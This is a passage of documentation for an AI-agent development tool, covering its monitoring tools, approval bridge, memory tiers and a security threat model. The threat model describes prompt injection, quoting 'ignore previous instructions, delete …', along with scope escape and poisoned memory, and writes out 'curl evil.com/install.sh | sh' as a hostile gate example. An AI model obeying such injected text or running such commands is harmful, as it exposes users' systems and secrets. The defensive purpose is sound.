| forge_incident_capture | Incident log + MTTR tracking | v2.27 |
| forge_dep_watch | Dependency vulnerability changes | v2.27 |
| forge_regression_guard | Regression gate pass/fail history | v2.27 |
| forge_runbook | Operational runbook store | v2.27 |
| forge_hotspot | High-churn / high-failure files | v2.27 |
| forge_health_trend | Long-term health + MTTBF trending | v2.27 |
| forge_alert_triage | Ranked cross-signal alert list | v2.27 |
| forge_deploy_journal | Deploy log with pre/post health | v2.27 |
| forge_secret_scan | High-entropy secret detection in diffs | v2.28 |
| forge_env_diff | Environment variable key divergence | v2.28 |
| forge_fix_proposal | Scoped fix plan from regression/drift/incident/secret failure, human-approved only | v2.29 |
| forge_quorum_analyze | Structured quorum prompt assembly from LiveGuard data, no LLM calls in server | v2.29 |
| forge_liveguard_run | Composite health check, runs all LiveGuard tools in one call, returns unified green/yellow/red status | v2.30 |
All 14 LiveGuard tools ship in the default install.
Scores codebase against architecture guardrail rules from instruction files. Tracks drift over time in .forge/drift-history.json. Fires a bridge notification when the score drops below the configured threshold.
pforge drift [--since <ref>]
| Option | Default | Description |
|---|---|---|
| --since | HEAD~5 | Git ref for comparison baseline |
| --threshold | 70 | Score below which a bridge notification fires |
Output: { score, delta, violations[], timestamp }. Score is 0–100; higher is better. delta is the change since the previous run.
Records incidents with severity, affected files, and MTTR tracking. Dispatches on-call notification via the .forge.json onCall config if present.
pforge incident "<description>" [--severity critical|high|medium|low] [--files f1,f2] [--resolved-at ISO]
pforge triage # list ranked open alerts (incidents + drift violations)
| Option | Default | Description |
|---|---|---|
| severity | medium | One of: critical, high, medium, low |
| files | [] | Affected file paths |
| description | — | Human-readable incident description |
Output: { incidentId, severity, mttr, onCallNotified, storedAt }. Incidents are appended to .forge/incidents.jsonl (one JSON record per line).
Scans dependencies for CVEs using npm audit. Compares against a previous snapshot in .forge/deps-snapshot.json. Alerts on new vulnerabilities only, unchanged findings are suppressed.
pforge dep-watch
Output: { newVulnerabilities[], resolvedVulnerabilities[], unchanged, snapshot }. Fires a dep-vulnerability hub event when new CVEs appear.
Extracts validation gate commands from plan files, executes them against the codebase, and reports pass/fail/blocked results. Used by the PostSlice hook and manually after refactors.
pforge regression-guard [--plan <plan-file>]
| Option | Default | Description |
|---|---|---|
| --plan | all plans in docs/plans/ | Specific plan file to check gates for |
Output: { gates[], passed, failed, blocked, summary }. Commands are allow-listed via GATE_ALLOWED_PREFIXES, dangerous patterns like rm -rf / are blocked.
Generates a human-readable operational runbook from a hardened plan file. Optionally appends recent incidents for context. Saves to .forge/runbooks/.
pforge runbook <plan-file> # generate a runbook from a hardened plan
Naming: Plan filename → lowercase → non-[a-z0-9-] replaced with hyphens → collapse → append -runbook.md.
Identifies git churn hotspots, files that change most frequently. Uses a 24-hour cache to avoid repeated git log queries.
pforge hotspot [--top 10] [--since 30d]
| Option | Default | Description |
|---|---|---|
| --top | 10 | Number of hotspot files to return |
| --since | 30d | Time window for churn analysis |
Output: { hotspots[{ file, changeCount, lastChanged }], since, cachedUntil }.
Aggregates drift scores, cost history, incident frequency, model performance, and test pass rates over a configurable time window. Returns an overall health score 0–100 plus a Health DNA fingerprint for decay detection.
pforge health-trend [--window 30d]
Output: { healthScore, drift, cost, incidents, models, tests, healthDNA }.
Health DNA (.forge/health-dna.json): Composite fingerprint, driftAvg, incidentRate, testPassRate, modelSuccessRate, costPerSlice. Compare across time to detect project decay before it manifests as bugs.
Reads incidents and drift violations, ranks by priority (severity × recency), and returns a prioritized list. Read-only, never modifies data.
pforge alert-triage
Output: { alerts[{ source, severity, priority, description, timestamp }], totalAlerts }. Priority is a computed score, higher means "address first".
Records deployments with version, deployer, notes, and an optional slice reference. Correlates with forge_incident_capture so incidents can be linked to the deploy that introduced them.
pforge deploy-log [--tag <tag>] [--notes "..."]
Output: { deployId, version, deployer, timestamp, notes }. Stored in .forge/deploy-journal.jsonl.
Scans git diff output for high-entropy strings using Shannon entropy analysis. Never logs actual secret values, all findings are masked to <REDACTED> in output, cache, and telemetry.
pforge secret-scan [--since HEAD~1] [--threshold 4.0]
| Option | Default | Description |
|---|---|---|
| --since | HEAD~1 | Git ref to diff against |
| --threshold | 4.0 | Shannon entropy threshold (higher = fewer but more confident findings) |
Output:
{
"scannedAt": "2026-04-13T...",
"since": "HEAD~1",
"threshold": 4.0,
"scannedFiles": 5,
"clean": false,
"findings": [{
"file": "src/config.js",
"line": 5,
"type": "api_key",
"entropyScore": 4.8,
"masked": "<REDACTED>",
"confidence": "high"
}]
}
.forge/secret-scan-cache.json) stores only file paths, line numbers, entropy scores, and <REDACTED> placeholders. If git is unavailable, the tool degrades gracefully with { clean: null, scannedFiles: 0 }. May annotate .forge/deploy-journal-meta.json sidecar with scan results.
Compares environment variable key names across .env files. Identifies keys present in the baseline but missing in targets (and vice versa). Never reads, logs, or caches environment variable values.
pforge env-diff [--baseline .env] [--files .env.staging,.env.production]
| Option | Default | Description |
|---|---|---|
| --baseline | .env | The reference environment file |
| --files | .env.* | Comma-separated target files to compare |
Output:
{
"scannedAt": "2026-04-13T...",
"baseline": ".env",
"filesCompared": 2,
"pairs": [{
"file": ".env.staging",
"missingInTarget": ["STRIPE_KEY"],
"missingInBaseline": []
}],
"summary": { "clean": false, "totalGaps": 1, "baselineKeyCount": 12 }
}
.forge/env-diff-cache.json) stores key names only. Values are never read from the environment files, the parser extracts the key portion of each KEY=value line and discards the rest.
LiveGuard tools read configuration from .forge.json at project root. Below are the root-level fields relevant to LiveGuard.
| Field | Type | Description |
|---|---|---|
| bridge | object | Bridge configuration, url (string), approvalSecret (string). Used for webhook notifications and approval gates. |
| model | string | Default AI model for plan execution (e.g., "claude-sonnet-4.6"). |
| onCall | object | On-call routing for incident notifications. name (string, required), person or team name. channel (string, required), notification channel ID or webhook. escalation (string, optional), escalation target if primary is unavailable. |
| hooks | object | Lifecycle hook configuration, preDeploy, postSlice, preAgentHandoff. See v2.29 for details. |
| openclaw | object | OpenClaw analytics bridge, endpoint (string), apiKey (string, see .forge/secrets.json). |
Example .forge.json with LiveGuard fields:
{
"bridge": { "url": "https://hooks.slack.com/...", "approvalSecret": "..." },
"model": "claude-sonnet-4.6",
"onCall": { "name": "Platform Team", "channel": "#incidents", "escalation": "eng-lead" },
"hooks": {
"preDeploy": { "enabled": true },
"postSlice": { "enabled": true },
"preAgentHandoff": { "enabled": true }
},
"openclaw": { "endpoint": "https://your-openclaw-instance" }
}
forge_smith checks onCall, if the field exists, it verifies that both name and channel are present and emits a warning (not an error) if either is missing.
The same unified dashboard, extended with a LIVEGUARD section, 7 real-time tabs driven by WebSocket hub events.
forge_liveguard_run composite results are displayed inline.
The LiveGuard section is part of the unified Plan Forge dashboard, no separate app or port required:
node pforge-mcp/server.mjs
Open localhost:3100/dashboard. The LIVEGUARD section appears in the tab bar after a visual divider, separated from the FORGE section.
The tab bar uses a two-section layout:
FORGE tabs use a blue active indicator. LIVEGUARD tabs use amber, you always know which half of the dashboard you're in.
The Health tab shows aggregate project health powered by forge_health_trend. Key widgets:
forge_cost_report.The Health tab auto-refreshes on every liveguard-tool-completed WebSocket event. No manual refresh needed.
Live list of open incidents from .forge/incidents.jsonl. Each card shows:
.forge.json onCall configFix Proposals Feed, when forge_fix_proposal has generated plans, a Proposed Fixes section appears at the top of the Incidents tab. Each entry shows the proposal file path, source type (regression/drift/incident/secret), and a Run in Assisted Mode → button that opens the Actions tab pre-filled with the plan path. The feed reads from GET /api/fix/proposals on tab load and on every fix-proposal-ready hub event.
Displays the output of forge_alert_triage, a ranked list of all open alerts sorted by priority (severity × recency). Each row shows:
Critical and high alerts show a red/amber left-border on their row. The tab badge shows the total number of unresolved critical+high alerts.
Surfaces results from forge_secret_scan. Shows:
<REDACTED> placeholders.POST /api/secrets/scanThe Security tab reads from .forge/secret-scan-cache.json on load and refreshes on liveguard-tool-completed events where tool === "forge_secret_scan".
Key-by-key comparison of all .env.* files in the project root, powered by forge_env_diff.
POST /api/env/diffThe tab reads from .forge/env-diff-cache.json on load. Cache is refreshed when forge_env_diff completes.
The Health and Incidents tabs each include a Run Quorum Analysis → link. Clicking it calls GET /api/quorum/prompt?source=<tab-source>&goal=risk-assess and opens a pre-populated quorum prompt in the Actions tab, ready to copy into your AI client. No model calls happen from the dashboard, it assembles the prompt for you.
Each LiveGuard tab header includes a Docs ↗ link. Clicking it opens this chapter in a new tab, you never lose your live dashboard session. The section header also has a Docs link pointing to this page's overview.
A second pair of eyes on a running forge. Read-only by design.
When you execute a long plan (pforge run-plan) the executor session is focused on one thing: building the next slice. It's not a good place to also answer "how's it going?" for a second human, or to notice anomaly patterns across multiple runs. The Watcher is the operational counterpart, it tails the run, reads event streams, and summarizes state.
Two modes, one tool:
forge_watch), file-reads only, zero AI cost. Returns slice counts, token usage, gate errors, anomalies.forge_watch with mode=analyze), invokes a frontier model (default claude-opus-4.7) to produce narrative advice from the snapshot.forge_watch_liveFor near-live observation, forge_watch_live tails the event stream for a bounded window:
.forge/server-ports.json).events.log when the hub isn't up.forge_watch {
targetPath: "E:/GitHub/Rummag",
mode: "snapshot"
}
forge_watch_live {
targetPath: "E:/GitHub/Rummag",
durationMs: 30000
}
The snapshot watcher runs heuristic rules over the run state and surfaces anomalies automatically. Examples:
review-queue-backlog, independent reviewer slices piling up.tempering-run-failed, a Tempering run returned non-zero.mutationBelowMinimum / flakyCount / perfRegressionCount, Tempering quality thresholds breached.Anomalies are emitted as watch-anomaly-detected hub events and appear in the dashboard's Watcher tab.
When recordHistory=true (the default in v2.35+), each snapshot is appended to the Watcher session's own .forge/watch-history.jsonl, never the target's. Pair with sinceTimestamp (pass the previous report's cursor) for gap-free continuous monitoring across multiple invocations.
The dashboard's Watcher tab consumes two event types:
watch-snapshot-completed, emitted when forge_watch builds a snapshot.watch-anomaly-detected, emitted when one or more anomaly rules fire.Chip rows surface Tempering state, Crucible funnel state, and a Home chip showing in-flight runs / open incidents / open bugs, all without touching the target project.
.forge/runs/<runId>/ and emits events to its own hub. History writes go only to the Watcher's cwd. Verified by the read-only subscriber test in pforge-mcp/tests/.
A natural pairing: the Watcher runs headless on a long run, and the Remote Bridge (Chapter 20) forwards hub events to Telegram, Slack, Discord, or OpenClaw so you can check progress from your phone. The Watcher never pushes, it just observes; the Remote Bridge decides what to surface.
Forward hub events off-box. Approve slices from your phone. One config, four channels.
551b850, 5b5a8e7; extended in later phases). Six channels supported out of the box: Telegram, Slack, Discord, Microsoft Teams, PagerDuty, and OpenClaw (Slack / Teams / PagerDuty / Email also ship as installable notify-* extensions under extensions/). Generic webhook routing, per-channel rate limits, and a live config watcher on the dashboard's Notifications subtab.
Plan Forge runs inside your IDE, but some decisions are not IDE-shaped. A reviewer flagged a drift anomaly at 2 AM. A quorum tie needs a human tiebreaker. An incident fired after you closed the laptop. The Remote Bridge forwards hub events to the places you already have notifications, Telegram, Slack, Discord, and supports inline approval / reject flows for the events that need a human.
| Channel | Best for | Approval flow |
|---|---|---|
| Telegram | Solo devs, inline buttons on your phone | ✓ Inline buttons (approve / reject) |
| Slack | Team channels, rich attachments, threading | ✓ Block Kit buttons |
| Discord | Community + OSS projects, embeds | ⚠ Message-based (no inline buttons) |
| OpenClaw | Agent-to-agent coordination | ✓ Handoff contract |
Every hub event carries a channels array. A single event can fan out to multiple destinations:
{
"type": "drift-alert",
"severity": "high",
"channels": ["telegram", "slack"],
"summary": "Drift score dropped from 0.91 → 0.62 after slice 04.2",
"approval": {
"required": true,
"options": ["continue", "pause", "rollback"]
}
}
Routing is driven by a channels filter on severity and event type. High-severity LiveGuard events (secret found, env key mismatch, drift ≥ threshold) route by default; informational snapshots do not.
For events with approval.required=true, the bridge renders interactive buttons (where the channel supports them). When a user clicks a button, the response flows back into the hub as an approval-response event with {channel, platform, user, decision, timestamp}. The orchestrator consumes that event to resume, pause, or roll back the run.
551b850) that queues overflow and drops low-severity events when saturated, never high-severity ones.
Credentials live in .forge/secrets.json (gitignored). The bridge config itself is in .forge.json under remoteBridge:
{
"remoteBridge": {
"enabled": true,
"channels": {
"telegram": {
"chatId": "-1001234567890",
"severityFloor": "medium"
},
"slack": {
"webhookPath": "slack-ops",
"severityFloor": "high"
}
},
"rateLimits": {
"telegram": { "perSecond": 30 },
"slack": { "perSecond": 1 }
}
}
}
Secrets (TELEGRAM_BOT_TOKEN, SLACK_SIGNING_SECRET, DISCORD_WEBHOOK_URL, etc.) stay out of git via the standard .forge/secrets.json scheme documented in the Guard station reference.
The dashboard's Config → Notifications subtab (shipped 5b5a8e7) gives you:
remote-test event)..forge.json reload without restart.OpenClaw is the exception: it's not for humans. When openclaw.endpoint is configured, the PreAgentHandoff hook posts a snapshot (drift, MTTR, open incidents) to OpenClaw before the next agent takes the turn. This lets a separate coordinator service inject context across agents in multi-agent mode, Claude to Codex, Codex to Cursor, and so on. Skipped automatically when PFORGE_QUORUM_TURN is set.
A recommended pattern: the Watcher (Chapter 19) runs on a long execution, emitting anomaly events into the hub. The Remote Bridge filters those events by severity and forwards the interesting ones to Telegram. Together they give you safe, phone-friendly observation of a forge running on another box.
The Remote Bridge is the notification and approval layer in Plan Forge's full AI-native development lifecycle. Understanding where it fits helps you configure it correctly. The diagram below shows the three pillars, Orchestration, Memory, and Execution, and how the bridge threads through all of them.
Here is how the Remote Bridge participates at each stage of the workflow. For the full narrative, see the unified-system blog post.
A developer sends a message via a phone channel (Telegram, WhatsApp via OpenClaw). The Remote Bridge's inbound path, powered by the ACP (Agent Communication Protocol), delivers the message to the hub as a request-received event. The orchestrator wakes up and begins the planning stage.
Once the plan is generated, the bridge sends a summary notification: "Plan hardened. 5 slices. Approve?" This is an approval-requested event with options ["approve","reject","revise"]. The developer's inline reply flows back as an approval-response event. The run does not start until approval is received.
The bridge emits a completion ping after every slice: "Slice 2 done. Tests pass. ✓" Slice failures route immediately to the configured high-severity channel. The orchestrator pauses and waits for a human reply or for the auto-escalation chain to handle it.
When the review session completes, the bridge delivers the verdict: "Review complete. 0 drift violations. Ship it?" The developer's reply triggers the ship or pause path, both of which are recorded in the hub event log with channel, platform, user, and timestamp.
Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.
Plan Forge is a developer-machine-first tool. The default deployment puts every component, orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard, on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, no external authentication broker. This is a deliberate posture: the threat model that applies to most users is my own machine plus the LLM providers I call, and the entire surface is designed to keep it that small.
Even so, three configurations expand the surface and deserve explicit treatment:
docs/plans/, memory hints in .github/copilot-memory-hints.md). The shared surface is the git repository.Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.
| Boundary | Crosses from | Crosses to | Control |
|---|---|---|---|
| 1. Workspace ↔ orchestrator | Trusted: user's IDE session | Trusted: long-running Node process | OS user; no in-process auth. |
| 2. Orchestrator ↔ LLM provider | Trusted: orchestrator | Untrusted: third-party API | TLS; API key bound by env var or .forge/secrets.json; provider's own auth. |
| 3. REST / WS hub ↔ localhost clients | Trusted: bound to 127.0.0.1 | Trusted: any process on the box | Loopback binding; no token auth by design. |
| 4. Worker ↔ plan / repo files | Trusted: orchestrator-spawned | Untrusted: file contents may include attacker text | PreToolUse hook (Forbidden Actions); scope contract. |
| 5. Hub ↔ Remote Bridge channel | Trusted: hub event | Untrusted: third-party messenger | Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config. |
| 6. Memory L2 ↔ OpenBrain L3 | Trusted: local L2 jsonl | Untrusted: external embedding store | Opt-in (off by default); per-record redaction; memory.l3Endpoint + token in .forge.json. |
127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL), see Hardening checklist.
Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.
| Surface | Input | Attacker class |
|---|---|---|
| REST endpoints (113 routes, Appendix W) | JSON body, query string, path params | Local process on the same box (any user with shell access). |
WebSocket hub (:3101/hub) | Subscribe / publish frames | Same as REST. |
| MCP stdio channel | JSON-RPC method calls from the IDE | Whoever controls the IDE session (typically: the user, or a malicious extension). |
Plan files (docs/plans/Phase-*.md) | Markdown + bash gate commands + scope contract | Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user. |
SKILL.md files (.github/skills/*) | Markdown + bash blocks per step | Anyone who can land a PR. Skills run with the same privileges as the orchestrator. |
Hook scripts (.github/hooks/*) | PowerShell / bash invoked at lifecycle events | Anyone who can land a PR. Hooks run on every session start, every tool use, every commit. |
| LLM tool output (worker responses) | Free-form text, code blocks, tool calls | Indirect, an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.). |
Extension catalog (extensions/catalog.json + installed packages) | Node packages with full file-system access | Extension author. pforge ext add implies trust. |
| Remote Bridge inbound | Approval / reject webhook calls from messengers | Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification). |
The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.
| Subsystem | Top threats | Mitigation |
|---|---|---|
| Orchestrator | T: tampered plan file injects malicious gate. E: skill step shells out as the user. | PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell, no sandbox, so plan/skill authors are inside the TCB. |
| REST / WS hub | I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can POST /api/run-plan. |
Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM. |
| MCP server | T: malicious IDE extension calls forge_run_plan on an attacker plan. I: same extension reads forge_search across the repo. |
Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel. |
| LLM provider call | I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream). | API key per provider (env var or .forge/secrets.json). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow. |
| Memory L2 / L3 | I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs. | L2 is local jsonl; L3 is opt-in. forge_memory_capture redacts by configured patterns. Per-workspace memory.namespace isolates L3 reads. |
| Remote Bridge | S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box. | Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in .forge.json#bridge.filters. See Chapter 20 — Remote Bridge security. |
| Extensions | E: extension's postinstall runs arbitrary code. T: extension hooks tamper with plan execution. |
pforge ext add installs from npm by default, treat as you would any production dependency. Pin versions in .forge.json#extensions[]. Audit catalog entries before enabling. |
Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.
An attacker plants instructions in content the worker will read, a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.
.github/workflows/, secrets, infra IaC). Enforced at hook time.tools: frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").
forge_search caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.{ ok, code, error, … } rather than raw concatenated text, making it easier for the worker to distinguish data from directives.The worker tries to do more than the slice was scoped for, bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.
forge_drift_report tool computes a drift score after each slice; the PostSlice hook warns when score drops below the configured threshold.Plan Forge reads secrets from three sources, in precedence order:
XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, etc. The standard CI path..forge/secrets.json, gitignored local file, JSON key→value. The standard developer-machine path.gh auth login, the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.
git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters, rewriting history does not retroactively un-leak a credential that's been mirrored or fetched.
Plan Forge has three supply-chain entry points; each has explicit controls.
| Entry point | Trust establishment | Update / verification |
|---|---|---|
| Plan Forge itself (template files, presets, prompts) | You cloned / installed from github.com/srnichols/plan-forge. | pforge self-update verifies the GitHub release tag; pforge check validates installed file checksums against the manifest. |
Extensions (extensions/catalog.json) | Per-extension npm scope. Catalog lists publisher. | Pin version in .forge.json#extensions[]. Audit the package before pforge ext add. CI should fail on unaudited additions. |
| LLM providers | Provider TOS + your API key. | Out of scope for Plan Forge controls; managed by the provider. |
Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade, the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.
What this means for threat modelers:
package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.docs/plans/, .github/skills/, and .github/hooks/ by people who would catch curl evil.com/install.sh | sh in a regular pipeline file.Two near-term defenses Plan Forge does provide:
statusReason: worker-signaled, see Appendix X — OS subprocess exits).forge_secret_scan + forge_env_diff before the deploy slice and blocks on severity ≥ high.For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.
| Control | Default | Production action |
|---|---|---|
Hub bound to 127.0.0.1 | Yes | Confirm; never bind 0.0.0.0 without an auth proxy. |
| Run orchestrator as non-privileged user | User-dependent | Verify; never run as root / SYSTEM. |
Secrets only in env or .forge/secrets.json | Yes | Audit repo with forge_secret_scan; rotate any historic leaks. |
.forge/secrets.json gitignored | Yes (template) | Confirm .gitignore entry; CI should fail if absent. |
| PreToolUse hook installed | Yes (post-setup) | Verify .github/hooks/PreToolUse.md present; pforge smith reports it. |
| PreDeploy LiveGuard hook enabled | Configurable | Enable in .forge.json#hooks.preDeploy with severity threshold high. |
| Plan / skill / hook PR review required | User-dependent | Branch protection: require review on docs/plans/**, .github/skills/**, .github/hooks/**. |
| Extensions pinned by version | User-dependent | Pin in .forge.json#extensions[].version; CI fails on bare-name installs. |
| Remote Bridge HMAC verified | Per channel | Slack / Teams: built in. Generic webhooks: configure bridge.<channel>.signingSecret. |
| L3 memory opt-in only | Off | Leave off unless required; if on, configure per-workspace memory.namespace and redaction patterns. |
| Audit log retention configured | 30 days | Adjust .forge.json#audit.retentionDays per compliance requirement (see Appendix N — Audit logging). |
| Air-gapped deployment validated | N/A | If required, follow Appendix N — Air-gapped deployment playbook. |
When something does go wrong, a forbidden file edited, a secret leaked, a worker shipped a destructive change, the LiveGuard surface is the front door:
forge_incident_capture records the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured..forge/runs/<runId>/trajectory.jsonl contains the full worker conversation, every tool call, every event. This is the forensic record./audit-loop classifies the finding into bug / spec / classifier lanes and files the appropriate issue.git revert on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under .github/instructions/.The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.
.forge.json hooks, configure preDeploy, postSlice, preAgentHandoff.drift-detected, preDeploy-blocked, quorum-model-failed.
Three tiers, one capture path. How Plan Forge remembers what it learned, across slices, across sessions, across plans.
.forge/*.jsonl files in your repo. Your project's permanent notebook.captureMemory() call writes to all three. If any tier fails, the others still succeed, nothing blocks your code.
And around those three tiers, v3.x added four pieces of craftsmanship: Hallmark stamps every record with a provenance envelope (hallmark/v1) so drift is detectable; Anvil hardens the L2→L3 doorway with a dead-letter queue and capability handshake so a network blip never loses a memory; Lattice sits alongside as a code-graph index the agent can query ("who calls this function?"); and forge_sync_memories pushes decisions and lessons up into Copilot's own Memory store so the next IDE session sees them automatically. The plain-English tour with numbers is in Chapter 22 — How the Shop Remembers.
forge_sync_memories)? They're covered in plain English in the next chapter, Chapter 22 — How the Shop Remembers. That chapter explains what we layered on top of the L1/L2/L3 tiers described here, and shows the cost/quality numbers proving why a cheaper model can now do work that used to require the expensive one.
Plan Forge separates volatile working memory from durable project memory from cross-project semantic memory. Every captureMemory call writes to all three in a single best-effort pass, no tier blocks the others, no failure aborts the calling tool.
| Tier | Storage | Lifetime | Read API | What v3 added |
|---|---|---|---|---|
| L1, Hub | EventEmitter in hub.mjs + .forge/hub-events.jsonl | Process lifetime + replay file | WebSocket subscribers, forge_watch | Unchanged. Same hub, same broadcast. |
| L2, Files | .forge/*.jsonl (memory-captures, gotchas, lessons, decisions, patterns…) | Repository lifetime | forge_memory_report, manual file reads | Hallmark stamps every new record (_v:1) so drift is detectable. |
| L3, OpenBrain | pgvector via .forge/openbrain-queue.jsonl drain | Cross-project, cross-session | search_thoughts, semantic recall | Anvil hardens the doorway (DLQ + capability handshake + boot drain). |
| + Lattice | .forge/lattice/{chunks,edges}.jsonl | Repository lifetime (rebuildable) | latticeQuery, latticeCallers, latticeBlast | Parallel axis, a code-graph the agent queries alongside memory. |
| ↑ Copilot Memory | Copilot's own Memory store (IDE) | Cross-session, IDE-wide | Copilot reads automatically | forge_sync_memories pushes decisions/lessons upward (additive, hash-deduped). |
forge_sync_memories fit on top of L1/L2/L3, see Chapter 22 § How the New Pieces Fit the Old Tiers.
OpenBrain isn't just a per-session scratch pad, it's a shared memory layer that compounds across every AI agent, every IDE, and every session. When Claude captures a gotcha in Slice 2, Copilot reads it in Slice 5 without any manual handoff. When Cursor records a naming convention, Claude's next run already knows it.
capture_thought({ content, project, source, type }) after a key decision. The record is scoped to your project and the originating slice path..forge/openbrain-queue.jsonl) and drains it to OpenBrain asynchronously.search_thoughts({ query, project, limit }) to surface relevant prior decisions before writing a single line of code.| Agent | Capture path | Retrieve path | Notes |
|---|---|---|---|
| Claude | capture_thought MCP tool |
search_thoughts MCP tool |
Full read/write; memory-preload event on plan start |
| Cursor | capture_thought MCP tool |
search_thoughts MCP tool |
Background agent and composer mode both supported |
| Copilot | capture_thought MCP tool |
search_thoughts MCP tool |
Lifecycle hooks (SessionStart) inject prior context automatically |
| Future agents | Any MCP client | Any MCP client | MCP-capable clients connect to the same store |
Concepts in this section were first explored in the blog posts One Framework, Seven AI Agents and From WhatsApp to Shipped PR: The Unified System.
One write, three destinations. The diagram below traces a single captureMemory({tool, type, body}) call from any tool through the dual-write fan-out:
┌──────────────────────────────────────────────────────────────────────┐
│ Any forge tool, watcher, hook, or skill │
│ └─► captureMemory({ tool, type, body, source }) │
└──────────────────────────────────┬───────────────────────────────────┘
│
┌──────────────────────────┼──────────────────────────┐
▼ ▼ ▼
┌──────────────────┐ ┌─────────────────────┐ ┌────────────────────┐
│ L1, Hub │ │ L2, Files │ │ L3, OpenBrain │
│ │ │ │ │ │
│ EventEmitter │ │ Append _v:1 record │ │ Append to │
│ broadcast │ │ to .forge/ │ │ openbrain- │
│ │ │ memory-captures │ │ queue.jsonl │
│ → WebSocket │ │ .jsonl │ │ │
│ subscribers │ │ │ │ Drain worker: │
│ │ │ Tag-route to │ │ batch → POST │
│ → hub-events │ │ gotchas.jsonl, │ │ → pgvector │
│ .jsonl replay │ │ lessons.jsonl, │ │ │
│ │ │ decisions.jsonl… │ │ Failures → DLQ │
│ Real-time UI │ │ │ │ .jsonl │
└──────────────────┘ └─────────────────────┘ └────────────────────┘
│
▼
┌──────────────────────┐
│ search_thoughts / │
│ buildPlanBootContext │
│ → preload on plan- │
│ start (memory- │
│ preload event) │
└──────────────────────┘
Every step is wrapped in try/catch. A failed L3 enqueue never blocks the L2 file append; a corrupt L2 file never blocks the L1 broadcast. This is the dual-write pattern: best-effort fan-out with structured telemetry on each branch.
The hub is a single EventEmitter instance in pforge-mcp/hub.mjs. Every event, slice start, model choice, tool result, memory capture, flows through it:
memory-captured.forge/hub-events.jsonl so a fresh dashboard can rebuild state on connectEvery memory file lives under .forge/ as line-delimited JSON. Each record carries a schema version field _v so the format can evolve without breaking older data:
| File | Contents |
|---|---|
| memory-captures.jsonl | Raw capture log, every captureMemory call |
| gotchas.jsonl | Type-routed: type: "gotcha" |
| lessons.jsonl | Type-routed: type: "lesson" |
| decisions.jsonl | Type-routed: type: "decision" |
| patterns.jsonl | Type-routed: type: "pattern" |
| conventions.jsonl | Type-routed: type: "convention" |
| openbrain-queue.jsonl | Pending L3 deliveries (drain worker source) |
| openbrain-dlq.jsonl | Permanently failed L3 deliveries |
| hub-events.jsonl | L1 replay log |
The Memory tab in the dashboard renders this exact set as a live KPI strip + per-file breakdown, see the dashboard chapter. The data comes from forge_memory_report, also exposed at GET /api/memory/report.
OpenBrain is the cross-project semantic store (pgvector + thought metadata). Plan Forge never writes to it directly during a tool call, that would couple every tool's latency to the OpenBrain endpoint. Instead, the path goes through the Anvil boundary: a small piece of code that owns delivery, capability negotiation, and failure recovery so the calling tool only ever talks to a local queue.
captureMemory appends one line to .forge/openbrain-queue.jsonl (microseconds, local I/O)openbrain-dlq.jsonl, the dead-letter queue that the next boot drains automaticallydrain-trend rolling window in forge_memory_report exposes pass/fail/deferred counts so the Memory tab can flag a stuck pipelinecaptureMemory never fails because of L3. When you later set openbrain.endpoint in .forge.json, the next drain pass ships the backlog.
When forge_run_plan emits run-started, the orchestrator calls buildPlanBootContext(plan, projectName) to derive a small set of semantic queries the agent should pre-fetch from L3 before slice 1:
